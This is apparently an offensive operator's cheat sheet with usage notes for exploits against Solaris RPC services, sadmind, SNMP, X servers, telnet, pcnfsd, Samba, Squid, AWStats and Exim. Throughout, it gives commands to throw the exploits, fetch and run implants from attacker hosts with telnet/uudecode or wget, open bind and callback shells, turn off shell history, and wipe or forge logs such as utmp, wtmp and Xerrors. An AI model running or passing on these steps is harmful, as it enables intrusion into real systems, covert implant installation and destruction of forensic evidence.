# The exploit window will prompt you to set up a listener like this: # You must establish a NOPEN listener on 192.168.250.3:SOME_RANDOM_PORT -nrtun RANDOM (as indicated in the -sploit exploit prompt) #Press enter #Now the exploit will occur and, after a couple of minutes, it will call back #to your listener. #Once the callback occurs, take the following steps: #In a local window LOCAL>closetunnel #Press 'A' to abort the autodone commands #Delete the files created by your exploit #There should be one lock file and one callog file -lt /var/spool/calendar -rm /var/spool/calendar/THE_TWO_MOST_RECENT_FILES #Use touch to set the directory timestamp back -lt /var/spool -touch /var/spool/SOME_OLDER_DIRECTORY /var/spool/calendar ### Usage: ./cmsex ./cmsex.auto ### get nopen ready packrat noserver ### no redirection ./cmsex -i TARGET_IP -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet LOCAL_IP NETCAT_PORT | uudecode && uncompress sendmail.Z && PATH=. sendmail' -T (-u RANDOM | -t RANDOM) ### Redirected: -tunnel u RANDOM TARGET_IP CMSD_PORT r NETCAT_PORT ./cmsex -i 127.0.0.1 -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet PITCH_IP NETCAT_PORT | uudecode && uncompress sendmail.Z && PATH=. s endmail' -T 3 -u RANDOM ### when the upload is done, kill the netcat, then try connecting in -nstun TARGET_IP -rm sendmail ### Logging: -lt /var/adm -lt /var/spool/calendar ######################################################### # EBB ######################################################### ### Sol2.10 vulnerable for only program 100230 metamhd using ebbshave.v4 ### ./ebbshave.v5 is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services ### Important: ebbnew_linux must be in your PATH command that is useful: rpcinfo -n -u|-t usage: ./ebbshave.v5 -o -v -t -p -o : one of the following options [1-19]: 1, "5.9 metamhd", program # = 100230, 2, "5.8 ruserd", program # = 100002, NOTE = version 1 3, "5.8 ruserd", program # = 100002, NOTE = version 2 - must start service first by using rpcinfo -n before using this option 4, "5.8 ttdbserverd", program # = 100083, 5, "5.8 cachefsd", program # = 100235, NOTE = version 1 - Start with option #6 first, if it fails then try this option 6, "5.8 cachefsd", program # = 100235, NOTE = version 2 - must start service first by using rpcinfo -n before using this option 7, "5.8 metad", program # = 100229, NOTE = version 1 8, "5.8 metad", program # = 100229, NOTE = version 2 - must start service first by using rpcinfo -n before using this option 9, "5.8 metamhd", program # = 100230, 10, "5.7 ruserd", program # = 100002, NOTE = must start service first by using rpcinfo -n before using this option 11, "5.7 kcms_server", program # = 100221, 12, "5.7 cachefsd", program # = 100235, 13, "5.7 ttdbserverd", program # = 100083, 14, "5,7 dr_daemon", program # = 300326, 15, "5.6 ruserd", program # = 100002, 16, "5.6 kcms_server", program # = 100221, 17, "5.6 cachefsd", program # = 100235, NOTE = version 1 - Start with option #18 first, if it fails then try this option 18, "5.6 cachefsd", program # = 100235, NOTE = version 2 - must start service first by using rpcinfo -n before using this option 19, "5.6 ttdbserverd", program # = 100083, -v : the program version number you are exploiting which is obtained from rpcinfo output -t : targets ip address -p : port number rpc program is listening on example: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772 If you fail to exploit using ./ebbshave.v5, try bruteforcing using ebbshave.v4 ### 1. Use the following command to look for a suitable program to hit ### Redirection: -tunnel l 111 TARGET_IP ### Local box: ./ebbshave.v5 ebbshave -p 127.0.0.1 ### 2. Verify the portnum will work (should respond "ready and waiting) ### Use either: # rpcinfo -n -u|-t # Ex.: ebbshave -n 32776 -t targetip 100229 ### Redirector: -tunnel l PORTNUM TARGET_IP ### Locally, see if the program you want is a viable option: ./ebbshave -n portnum -t host prognum ./ebbshave -n PORTNUM -t 127.0.0.1 PROGNUM ### Use this for usage statement ./ebbshave ###### 3. Plug in your choices and go: ### Netcat window: packrat NETCAT_PORT ### Redirector: -tunnel l 111 l PORTNUM TARGET_IP r NETCAT_PORT ### Locally: #ebbshave -B -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM ebbshave -n -t 127.0.0.1 # To throw it: ebbshave -T -n -t 127.0.0.1 ### If that doesn't work, try without the best guess (B) option, or maybe increase th ### timeout period (W) ebbshave -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM ### If successful, you should get a root shell ### Get the following ready for pasting: (paste one line at a time) unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la uncompress sendmail.Z netstat -an | grep RAT_PORT D="-l RAT_PORT" PATH=. sendmail ### pitch window -nstun TARGET_IP RAT_PORT ###### Cleanup: /usr/openwin/bin/core /var/adm/messages Other cores locations? Always look at utmp, wtmp,etc ####### If you've hit this before and know the addresses: # Ex.: ./ebbshave -T 1 -S 0xffbefa20 -E 0xffbefa20 -n 32775 -t target 300326 ######################################################### # BS - BLUE ######################################################### # ../bin/bs.tr -h # # Usage: # [E=ratpreargs] [A=ratpostargs] bs.tr remoteIP remoteHost \ # [remoteDomain] \ # sadmindPort remoteDir remoteName localIP localPort # # ratpreargs : the string put on remote command line right after PATH=. and # before remoteName (e.g. E='C="-c LOCALIP port"' or # E='C="-l listenport"') # # ratpostargs : the string put on remote command line after running remoteName # # # Command sent to bs will be munged from: # #CMD="mkdir -p ${REMOTE_DIR} && cd ${REMOTE_DIR} && telnet ${LOCAL_IP} ${LOCAL_PORT} < / #dev/console | uudecode > /dev/null 2>&1 && uncompress -f ${REMOTE_FNAME}.Z && chmod 755 # ${REMOTE_FNAME} && PATH=.${RAT_PREARGS} ${REMOTE_FNAME}${RAT_POSTARGS}" ### TRICK - use -A option to get its archtype back ### TRICK - give a bad hostname to see if it's running in secure mode; if it complains, then ### it's still vulnerable, and work out the other options; if there's not response ### try another bad name; if still no response, then it's running in secure mode and ### not vulnerable ### Scan target #rpcinfo -p TARGET_IP # #rpcinfo -n BSPORT -u TARGET_IP 100232 #rpcinfo -n BSPORT -t TARGET_IP 100232 -scan rpc TARGET_IP mx :%s/SADMIND_PORT/SADMIND_PORT/g :%s/REMOTE_DIR/\/tmp\/WORK_DIR/g `x ###### Start netcat packrat NETCAT_PORT ############# BS w/ NO REDIRECTION ########### ###### 1. No redirection: ### To use default port # ./bs.tr TARGET-IP TARGET-NAME SADMIN-PORT REMOTE-DIR RAT-NAME LOCAL-IP NETCAT-PORT # ./bs.tr TARGET_IP TARGET_NAME SADMIN_PORT REMOTE_DIR RAT_NAME LOCAL_IP NETCAT_PORT ### Try in this order: bs.auto -i IP -u SADMIND_PORT TARGET_IP bs.tr_TRY_SECOND remoteIP remoteHost [remoteDomain] sadmindPort remoteDir remoteName localIP localPort bs.tn.gr_USE_WHEN_bs.auto_AND_bs.tr_FAIL ### To give a port: #E='D="-l RAT-PORT"' ./bs.tr TARGET-IP TARGET-NAME TARGET-DOMAIN SADMIND-PORT REMOTE-DIR RAT-NAME LOCAL-IP NETCAT-PORT #E='D="-l RAT_PORT"' ./bs.tr TARGET_IP TARGET_NAME TARGET_DOMAIN SADMIND_PORT REMOTE_DIR RAT_NAME LOCAL_IP NETCAT_PORT ###### 3. Waiting: # you will see bursty traffic on your tcpdump, first the trigger, then the connection to upload nopen. # Hit Ctrl-C on your nc ###### 4. COnnect to target: ### Direct connect: cd ../down noclient TARGET_IP:RAT_PORT # or ### Callback - have this ready and waiting when running attack: cd ../down noclient -l RAT_PORT ############# BS w/ REDIRECTION ########### ###### 1. on redirector -tunnel u SADMIND_PORT TARGET_IP r NETCAT_PORT s # and this if nopen needs to run in callback mode: r RAT_PORT ###### 2. Local window ### Syntax (domainname is not always necessary): CommandLine: ../bin/bs.tn.gr -h New usage: ./bs.tn.gr [options] -- [options to ] -i (required) -h (required) -a (does not work) Use alt rpcbind port -s hardwired 111 -r hardwired 111 -d -p def= query rpcbind -l (required) -n (no default) -f (required) -D def= /tmp/... -S def= /tmp/.... -G grinch args deprecated ### Redirection: ### E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET-NAME TARGET-DOMAIN SADMIND-PORT REMOTE-DIR RAT-NAME PITCH-IP NETCAT-PORT ### No domainname: E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NAME PITCH_IP NETCAT_PORT ### With domainname: E='D="-l RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME TARGET_DOMAIN SADMIND_PORT REMOTE_DIR RAT_NAME PITCH_IP NETCAT_PORT ### Callback: E='D="-c PITCH_IP RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NAME PITCH_IP NETCAT_PORT ###### 3. Waiting: # you will see bursty traffic on your tcpdump, first the trigger, then the connection to upload nopen. # Hit Ctrl-C on your nc ###### 4. From redirector: -nstun TARGET_IP RAT_PORT # or -nrtun RAT_PORT -call PITCH_IP RAT_PORT ###### Cleanup: # usually nothing ########################################################### # GS - GREEN ########################################################### gs.auto Usage: $PROG -i [ options ] -i IP IP of target machine (NO DEFAULT) -g opt Change default GS option from ./$GS_OPTION to \"./opt\" (can be grins, frowns or sneer). -C str Change default community string from public to \"str\". -l IP IP of attack machine (Default: the first active IP found in this order: ppp0, ppp1, eth0 or eth1) -n # rat upload port (Default: a random port) -p # Use port # for RAT listen/callback. (Default: random) -s # Change delay used for -c to # seconds (must appear before -c). -c Use NOPEN syntax to have RAT callback after a delay (Default delay: $CALLBACKDELAY seconds). Callback is to -l IP. -k Use ksh method instead of telnet/uu*code. -z Do NOT use uncomrpess at the either end -r rat name of rat on target (Default: sendmail) -D dir directory to work from/create on target (Default = /tmp/.scsi) -P Assume PATH=. will fail so use ./ratname target, and MUST NOT use uuencode on upload. -a ARCH String used to determine which architecture NOPEN server to upload from /current/up/morerats/ using this (note tail -1): \"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1\". If not provided or no match, /current/up/noserver is assumed. -G Retry exploit--using already uploaded RAT (useful when you need to try adding -P option or try another RAT callback port). ### Or the old way: # sneer(2.6) or frowns(2.7+) gs.os.gr Usage: /home/black/tmp/20030124-0318/./bin/gs.os.gr [options] -i (required) -g def= frowns -l (required) -n (required) -c (no default) -D def= /tmp/.X11R6 -f def= nscd -E (no default) -A (no default) -S DEPRECATED (and ignored) -s DEPRECATED (and ignored) rpcinfo -p TARGET_IP rpcinfo -n GSPORT -u TARGET_IP 100249 rpcinfo -n GSPORT -t TARGET_IP 100249 # From PI -scan rpc TARGET_IP -scan mibiisa TARGET_IP # should respond w/ snmp version or h/w type if mibiisa is running: -scan snmp1 TARGET_IP # should give motd banner to tell you the OS -scan snmp2 TARGET_IP # If the above don't answer, GS won't work #if the scans answer with "No such name" then they are probably not vulnerable # anything else might be worth a shot as long as you're getting udp 161 to target ### In netcat window: packrat NETCAT_PORT # Tunneling # on redirector -tunnel u 161 TARGET_IP r NETCAT_PORT s # logging depends on sneer(2.6) or frowns(2.7+) # With redirector: #./gs.os.gr -i 127.0.0.1 -g -l PITCH-IP -n NETCAT-PORT -D /tmp/WORK-DIR -f RAT-NAME ./gs.os.gr -i 127.0.0.1 -g -l PITCH_IP -n NETCAT_PORT -D /tmp/WORK_DIR -f RAT_NAME # NO tunneling # Local window #./gs.os.gr -i TARGET-IP -g -l LOCAL-IP -n NETCAT-PORT -D /tmp/WORK-DIR -f RAT-NAME ./gs.os.gr -i TARGET_IP -g -l LOCAL_IP -n NETCAT_PORT -D /tmp/WORK_DIR -f RAT_NAME # Both cases: #you wait 4 minutes, and you should see the upload of nopen # Ctrl-C your nc ### Connect to target: ### Straight connect (no redirection) cd ../down ../bin/noclient TARGET_IP ### Connect using redirector: -nstun TARGET_IP ### Cleanup: ### run cleaner after frowns (or else another callback in 4 minutes) (might be automatic now) ### rm /tmp/mibiisa_ps_data ### toast utmp, wtmp, utmpx, wtmpx ############################################### # YS - YELLOW ############################################## ### New way: Usage: ys.auto -i TARGETIP [options] -i IP IP of target machine (NO DEFAULT) -l IP IP of attack machine (Default: the first active IP found in this order: ppp0, ppp1, eth0 or eth1) -n # rat upload port (Default: a random port) -p # Use port # for RAT listen/callback. (Default: random) -s # Change delay used for -c to # seconds (must appear before -c). -c Use NOPEN syntax to have RAT callback after a delay (Default delay: 3 seconds) -z Do NOT use uncomrpess at the either end -e Do NOT use "2>&1" on target. Fouls up in some shells. -r rat name of rat on target (Default: sendmail) -x # port to start mini X server on (Default: random port) -D dir directory to work from/create on target (Default = /tmp/.scsi) -P Assume PATH=. will fail so use ./ratname target, and MUST NOT use uuencode on upload. -a ARCH String used to determine which architecture NOPEN server to upload from /current/up/morerats/ using this (note tail -1): "ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1". If not provided or no match, /current/up/noserver is assumed. NOTE: -x # and -p# can be the same, even in callback mode. ys.auto provides a mechanism to allow netcat callback to finish, and its -tunnel to close before the NOPEN server calls back on the same port. examples: ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -D /tmp/.dir ys.auto -i 10.0.3.1 ys.auto -i TARGET_IP -l REDIRECTOR_IP NOTE: The only REQUIRED ARGUMENT is now -i The best way to back out of ys.auto once done (whether or not you get on target) is to kill off the packrat window first with ^C then ^D. Then kill of the xc window the same way, finally kill the ys.auto. ys.auto Version 1.4.1.1 ### Old Way: mx :%s/XSERVER_PORT/x/g x -scan xwin TARGET_IP ### Locally: packrat NETCAT_PORT #or packrat -n /current/bin/nc.YS NETCAT_PORT ######### YS With no redirection: ### Local Window 1: #./wrap-sun.sh -l LOCAL-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WORK-DIR ./wrap-sun.sh -l LOCAL_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WORK_DIR ### Local Window 2: #./xc -x LOCAL-IP -y XSERVER-PORT -s LOCAL-IP TARGET-IP ./xc -x LOCAL_IP -y XSERVER_PORT -s LOCAL_IP TARGET_IP ###### YS With REDIRECTION: ###### 1. On redirector - set up nopen tunnel -tunnel u 177 TARGET_IP r XSERVER_PORT r NETCAT_PORT s ###### 2. Local window1 #./wrap-sun.sh -l 555.41.145.11 -r sendmail -p 24389 -x 39942 -d /tmp/.scsi #./wrap-sun.sh -l PITCH-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WORK-DIR ./wrap-sun.sh -l PITCH_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WORK_DIR # hit return # type y and hit return ###### 3. Local Window2: # for redirection local ip is redirector ip #./xc -x PITCH-IP -y XSERVER-PORT -s PITCH-IP 127.0.0.1 #./xc -x 555.41.145.11 -y 39942 -s 555.41.145.11 127.0.0.1 ./xc -x PITCH_IP -y XSERVER_PORT -s PITCH_IP 127.0.0.1 # hit return # hit return # hit return # (At this point you should see a continue.... in your attack1 window # in the attack1 window # hit return # hit return # hit return # (you should see your upload happen...) ### IF Exploit is successful # DOING THE FOLLOWING WILL GREATLY REDUCE POSSIBLE LOGGING. # ONLY HIT CONTINUE, IN THE MINI X SERVER WINDOW, ENOUGH # TIMES TO GET THE RAT UPLOADED. # WATCH TCPDUMP OUTPUT TO DETERMINE WHEN RAT IS UPLOADED. # ONCE THE RAT IS UPLOADED, CONNECT # TO THE TARGET VIA THE RAT AND DO THE FOLLOWING: ps -ef | grep dtlogin kill PID # IF YOU SELECTED THE CORRECT dtlogin PID, THEN YOU SHOULD SEE A # "connection closed" MESSAGE IN YOUR MINI X SERVER WINDOW. IF # NOT, YOU SELECTED THE WRONG PID AND JUST KILLED SOMEBODY ELSE'S # dtlogin. IF ALL GOES WELL, HIT control ^C IN THE MINI X SERVER # WINDOW AND THE XC WINDOW. # Ctrl-C your nc window # Ctrl-C your xc window ###### Double window way: ### Local scripted (you'll type commands in this): nc -l -p RPORT1 ###Local scripted (your output from above will appear here): nc -l -p RPORT2 ### or instead, use doublet in a scripted window (type and output all in same window): doublet -O -t -i PITCH_IP RPORT1 ### then set up the tunnels as below, and use wrap-telnet.sh and xc ### Scripted #1 wrap-telnet.sh -l REDIRECTIP -p RPORT1 -s RPORT2 -x XPORT ### Scripted #2 # xc -x REDIRECTIP -y XPORT -s REDIRECTIP 127.0.0.1 ### Redir # -tunnel # u 177 TARGET_IP # r XPORT # r RPORT1 # r RPORT2 # r NETCAT_PORT #w/o tunneling cd ../down ../bin/noclient TARGET_IP #w/ tunneling. In redirector window -nstun TARGET_IP -rm RAT_NAME ###### Cleaning up ###### ### The error log file is configurable and so you must examine ### their xdm-config file to find out where errors are being ### logged. ### ### HAVE TO LOOK THROUGH "find" file from getscript egrep -i '(xdm-config|errors|xerror)' /current/*find*m ### if no find available one of these will probably find it -ls /tmp/*errors /var/dt/*errors -cat error_file -grep PITCH_IP /var/adm/SYSLOG /var/log/syslog /var/adm/messages -ls -t /var/dt/ ### you will notice Xerrors is the most recent -tail /var/dt/Xerrors ### if your entries are the only ones there.... cat /dev/null >/var/dt/Xerrors ### if there are other entries you will do something like wc -l /var/dt/Xerrors ### subtract the number of lines that are because of you from above head -(what's left) > t ; cat t ### if it looks good: cat t > /var/dt/Xerrors -cat /var/dt/Xerrors -rm t -ls -t /var/adm ### anything that has a reasonably current timestamp you should check ### toasting the login entries..... ### Target window -put ../up/toast t ### TO VIEW... ./t -u /var/adm/utmp ./t -u /var/adm/wtmp | tail -20 ./t -x /var/adm/utmpx ./t -x /var/adm/wtmpx | tail -20 ./t -l /var/adm/lastlog | tail ### TO ZAP... ./t -u /var/adm/utmp tty date ./t -u /var/adm/wtmp tty date ./t -x /var/adm/utmpx tty date ./t -x /var/adm/wtmpx tty date ./t -l /var/adm/lastlog /var/adm/wtmpx user ################################################ # CATFLAP ################################################ ### on redirector -stun TARGET_IP 23 # or -tunnel l 2323 TARGET_IP 23 r NETCAT_PORT ### Local window # run catflap to generate output for pasting into telnet: # syntax: /current/bin/catflap_sparc -h # Ex: #/current/bin/catflap_sparc -7 -c "/bin/sh" /current/bin/catflap_sparc - -c "/bin/sh" ### on redirector -rtun NETCAT_PORT ### Local window ftshell telnet localhost 2323 ### paste catflap output once you get telnet prompt ### should get root prompt ### Now upload rat ### with ftshell: unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd ~~p noserver sendmail ls -la chmod 700 sendmail PATH=. D="-l RAT_PORT" sendmail ### now root on target (do the following if you did NOT use ftshell) unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la uncompress sendmail.Z netstat -an | grep RAT_PORT D="-l RAT_PORT" PATH=. sendmail ### pitch window -nstun TARGET_IP RAT_PORT ### or in root target window/nc once ### you have nopen on target -put /current/up/toast t -ls -t /var/adm /var/log ### look at entries ./t -u /var/adm/utmp ./t -u /var/adm/wtmp | tail -20 ./t -x /var/adm/utmpx ./t -x /var/adm/wtmpx | tail -20 ############################################ # EXPOSITTRAG ############################################ # exploit pcnfsd version 2.x (fails on v.1 or 3+) # # whatever redirector you use, port 514 cannot # be in use netstat -an | grep 514 # to determine the version -scan rpc TARGET_IP -tunnel u UDP_PCNFSD_PORT TARGET_IP # LOCAL #./prout -w TARGET_IP UDP_PCNFSD_PORT ./prout -w 127.0.0.1 791 # pcnfsd version 1, version 3 and higher are not vulnerable packrat PACKRAT_PORT -tunnel r PACKRAT_PORT u PCNFSDPORT TARGET_IP # An example of nopen.t: (note the size of the this file is 482. If you make # modifications, change the size appropriately) # use nopen.t file from build, if not # can be made with hexedit C0755 482 t #!/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/usr/local/etc:/usr/sbin:/usr/bin:/opt/SUNWspro/bin:/etc:/usr/ccs/bin:/usr/lib/nis:/ usr/sbin:/usr/bin export PATH mkdir /tmp/.scsi cd /tmp/.scsi telnet PITCH_IP PACKRAT_PORT < /dev/console |uudecode uncompress -f sendmail.Z chmod +x sendmail #PATH=. D=-cPITCH_IP:NOPEN_PORT sendmail PATH=. sendmail /etc/init.d/pcnfs stop /etc/init.d/pcnfs start nc -vv -l -p 514 < nopen.t # edit nopen.t, note the size, subtract 14 from the actual size and replace 482 with the new size -rtun 514 127.0.0.1 #./slugger2 TARGET_IP TARGET_PORT CMD [PRINTER_NAME] ./slugger2 TARGET_IP TARGET_PORT "cd .. cd .. cd .. cd .. cd tmp rcp -p PITCH_IP:t .t sh .t " # CLEANUP /bin/rm /tmp/.t # also might be /tmp/-p /bin/rm -rf /tmp/.scsi # /var/adm/messages will have pcnfs errors # check history files ###################### ECHOWRECKER ##################### # samba server vulnerability # Samba 3.0.2a-9AX and Samba 3.0.5 are currently vulnerable # Samba 2.x on Redhat 7.3, 8.0, and 9.0 are vulnerable -scan win_scan TARGET_IP -tunnel l 139 TARGET_IP r RATPORT ./echowrecker_quiet -O -h -c [-s ] [-e ] [-a ] [-b] [-l] [-d ] [-i ] General cases: 0 - Samba 3.0.2a-9AX [uses info leak] 1 - Samba 3.0.5 [uses info leak] 2 - Samba 2.2.7a (rh9 default) [uses info leak] (DO NOT USE) Specific cases: 3 - Redflag 4.0 (kernel 2.4.20 samba 3.0.2a-9AX) (after restart of smb service) 4 - RedFlag 4.0 (kernel 2.4.20 samba 3.0.2a-9AX) (after reboot of server) 5 - RedFlag 4.0 AS SE (kernel 2.4.20 samba 2.2.8) (after restart of smb service) 6 - RedFlag 4.0 AS SE (kernel 2.4.20 samba 2.2.8) (after reboot of server) 7 - RedHat 7.3 (kernel 2.4.18-3 samba 2.2.3a) 8 - RedHat 8.0 (kernel 2.4.18-14 samba 2.2.5) 9 - RedHat 9.0 (samba 2.2.7) 10 - SuSE 9.0 (kernel 2.4.21 samba 2.2.8a) -b = turn bruteforcing on -l = just do info leak and print returned bytes - good for fingerprinting -d = seconds of delay between brute force attempts -s = start of address range to brute force for the location of the shellcode -e = end of address range to brute force for the location of the shellcode -a = address in GOT of function pointer to overwrite (usually 'free') [exactly, not the addr-0xc] to find it -> # objdump -R /usr/sbin/smbd | grep free -s, -e, -i, -a should be input in hex (ie 0x1000) -c = command to run on server as euid root Ex: -c "/usr/bin/wget -O /tmp/a http://555.1.2.21/noserver && chmod 755 /tmp/a && /tmp/a" ========================================================= Also, if the use of the "quiet" echowrecker edition is desired, usage is such: $ make quiet $ ./echowrecker_quiet -O 0 -h 127.0.0.1 -c "/usr/bin/wget -O /tmp/a http://PITCH_IP:RATPORT/crond && chmod 755 /tmp/cron d && /tmp/crond" . Found [20] to try Trying [1 of 100] Trying [2 of 100] etc... ###################### ELECTRICSLIDE ##################### # Heap Overflow in squid 2.5.STABLE1-2 redhat 9.0 -scan 3128 TARGET_IP -tunnel l 3128 TARGET_IP -tunnel 9999 udp ./electricslide.pl -t -o -d -l [-U ] [-P ] [-n ] [-f ] [-a ] -h, --help Print this helpful message -t, --target Target Squid server ip -o, --target-type Target type (see list below) -l, --listen Electricslide listen port which Squid will connect to -U, --proxy-user Proxy-Auth user name (if required) -P, --proxy-pass Proxy-Auth password (if required) -n, --nopen Set to port of UDP nopen tunnel -f, --nopen_forward The address and port of the target machine to forward the attack to through the nopen tunnel -a, --local-addr The local ip address (not 127.0.0.1) -d, --delay Web server exploit transmit delay (The web server will delay the last 400 bytes of the payload this number of seconds. This ensures that the shellcode will be in proper alignment when the exploit occurs. Default 30) Examples: # - Shooter with receiver on port 80: #./electricslide.pl -t TARGET_IP:3128 -l LOCAL_IP:80 -d 30 -o 0 # # - Shooter with receivers on port 80 using proxy auth: #./electricslide.pl -t TARGET_IP:3128 -l LOCAL_IP:80 -d 30 -o 0 -U "user" -P "password" ./electricslide.pl -t 127.0.0.1:7777 -l PITCH_IP:8888 -o 0 -n 9999 -f TARGET_IP:3128 nc 127.0.0.1 9999 # or eslide [options] <-t profile> <-l listenerip> -------------------------------------------------------------------------- Options: -A Proxy authentication info in username:password format -l The ip address for the connect-back proxy request. -p The target port. Default: 3128 -P The connectback port. Must be allowed by proxy. Default: 80 -t The profile number. See supported profiles below -k Disable the firing of the killer profile which gets a fresh heap (at your own risk!) Profiles: [0] Gentle Persuasion [1] Redhat 9 ./electricslide -t 1 -l LOCAL_IPorPITCH_IP TARGET_IPor127.0.0.1 ###################### ELMIRASIGNET ##################### # vulnerability in awstats software < 6.3 on apache server # jogswirl -tunnel l 80 TARGET_IP r 5555 # vulnerable ? -scan http TARGET_IP # galeon http://127.0.0.1/cgi-bin/awstats.pl Advanced Web Statistics 6.1 (build 1.704) # ./xp_awstats.pl -i 127.0.0.1 -d /cgi-bin/awstats.pl -e 0 -c "uname -a;ls -la;w" ./xp_awstats.pl -i -d -e -c -i <127.0.0.1> -d -p -e 0: ?pluginmode=:system("CMD"); 1: ?configdir=|CMD| 2: ?update=1&logfile=|CMD|&framename=mainright -c Examples: 1) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"uname -a;ls -la;w" 2) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http:// PITCH_IP:5555/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:9999 PATH=. sendmail) 2>/dev/null" -nstun TARGET_IP:9999 ###################### ERRGENTLE ########################## # exploits vulnerability Exim 3.22 thru Exim 3.35 Mail Transfer Agent # brute force ###### Version 3 # Upload on PITCHIMPAIR and run netstat -an | grep LISTEN | grep 113 mkdir /tmp/.scsi -cd /tmp/.scsi -put /current/bin/xp-exim-3-remote-solaris-v3 x -shell ./x -i TARGET_IP -p 25 -d SCAPEGOAT_DOMAIN -u nobody -t # states if vulnerable; hit return to throw if vulnerable # takes about 1000 hits; scrolls fast; will get root prompt unset HISTSIZE unset HISTFILESIZE unset HISTFILE id pwd # will put you in /usr/exim-3.33/spool PATH=. crond exit -rm /tmp/.scsi/x /tmp/.scsi # check /var/log/messages for audit message or PAM failed attempt, ###### Version 2 -tunnel l 25 TARGET_IP r 113 r RANDOM_PORT # test susceptability: -scan mail TARGET_IP ./xp-exim-3-v3 -i 555.1.2.150 -p 25 -t -d a.jetson.net -u nobody ./xp-exim-3 -i 127.0.0.1 -p 25 -c "sh &0 2>&0" -t # response should be something like: # It's vulnerable! Hit a key to start # change location of heap to point to other location using -l: ./xp-exim-3 -i 127.0.0.1 -p 25 -t -l2 -c "sh &0 2>&0" # or (echo -e "HTTP/1.0 200\n";cat sendmail) | nc -vv -l -p RANDOM_PORT # older versions of redhat cannot use /dev/tcp redirection, use wget; ./xp-exim-3 -i 127.0.0.1 -c "mkdir /tmp/.scsi; cd /tmp/.scsi; wget http://PITCH_IP:RANDOM_PORT/sendmail -osendmail;chmod +x sendmail*; PATH=. sendmail;PATH=. sendmail.1; PATH=. sendmail.2;" ## clean logs # several entries in /usr/exim/spool/log/* # with something like unqualified sender rejected -lt /var/log/messages -lt /var/log/maillog -lt /usr/exim/spool/log -tail /usr/exim/spool/log/rejectlog -tail /usr/exim/spool/log/mainlog ############################################ # TOOLTALK -DEC, IRIX, or Sol2.6 or earlier ############################################ -scan rpc TARGET_IP # look for 100083 1 tcp 30889 ttdbserverd rpcinfo -n TTDBSERVERD_PORT -t TARGET_IP PROG_NUM packrat pmgrd NETCAT_PORT #ex:./dec_tt.tn.gr 1 200.21.200.2 LOCAL_IP 25 /tmp/.advtags 30889 ./dec_tt.tn.gr 1 TARGET_IP LOCAL_IP NETCAT_PORT /tmp/WORK_DIR 30889 ################################################ ### VS - VIOLET ### You need to do this exploit from a box very close (ideally on the same net) ### as the target because of the traffic it generates. ### Reference the README file in /current/bin for help on the new version ################################################ #Start Xserver on local ops machine prior to logging in ### VS version5 xhost + iptables -F netstat -an |grep 6000 (make sure local xserver is listening) ### run the test version first to get the times (if vulnerable): -put /current/bin/vs.gettime.sol.sparc v rpcinfo -p TARGET_IP #Ex: ./v -i 202.83.160.51 -h ATMNMS -n 34647 -p 443 ./v -i TARGET_IP -h HOSTNAME -n TCP_PROGRAMPORT -p CALLBACK_PORT ### hit return when prompted; once you get the times for the cookie ### you can throw the attack thru the redirector -rm v -cd /tmp -rm .scsi ### set up the tunnels, using whichever ports you think can call back: -tunnel l TCP_PROGRAMPORT TARGET_IP r 8080 127.0.0.1 6000 r 443 ### locally, send the exploit: ./vs.attack.linux -i 127.0.0.1 -h HOSTNAME -x 8080 -c PITCH_IP -p 443 -n TCP_PROGRAMPORT -7(optional) -v 5 -T SECOND_FROM_GETTIME -t MICROSECS_FROM_GETTIME ### a dtterm should eventually pop up - get that mouse outta the way; get those unsets ready! ###old way: xhost + iptables -F netstat -an |grep 6000 (make sure local xserver is listening) #connect to redir (you'll need two windows, one for the tunnel, #one to run the exploit) #create a working dir on redir #upload nopen #start nopen #check if you'll need to elevate (hope to see superuser next to # vs port): rpcinfo targetIP (no options) #prepare vs.sparc command or vs.linux (depending on OS of local # box or redir box) #upload vs.sparc executable to redir #create tunnel in nopen redir window r 22222 127.0.0.1 6000 #paste vs command into 2nd nopen window (on redir) -shell ./vs.sparc -7 -v 5 -i IP -h name -D -q PITCH_IP -p tunnelport -n programport #hit return when prompted and wait possibly a long time) #keep mouse/cursor away from area where window may pop up #watch tcpdump window #when dtterm pops up, paste each command: w df -k #hit return on netcat window #create another tunnel to netcat r 32177 #in dtterm, paste upload command #be sure to allow enough time for upload to get past redir and # all the way to target controlC netcat #from redir, attempt to connect to target w/ nopen #if successful, paste "exit" in dtterm #If not, may have to start in callback mode #paste upload commands #./vs.linux -i target_ip -h hostname -r prog_num -v rpc_version -D -q local_ip -p 6000 -n ? ./vs.linux -i -h -D -q -p 6000 -v 5 -r -n 52213 #Misc ex: ./vs.linux -i 555.1.2.79 -h blade1000 -D -q 554.208.30.2 -p 6000 -v 5 -r 1289637086 -n 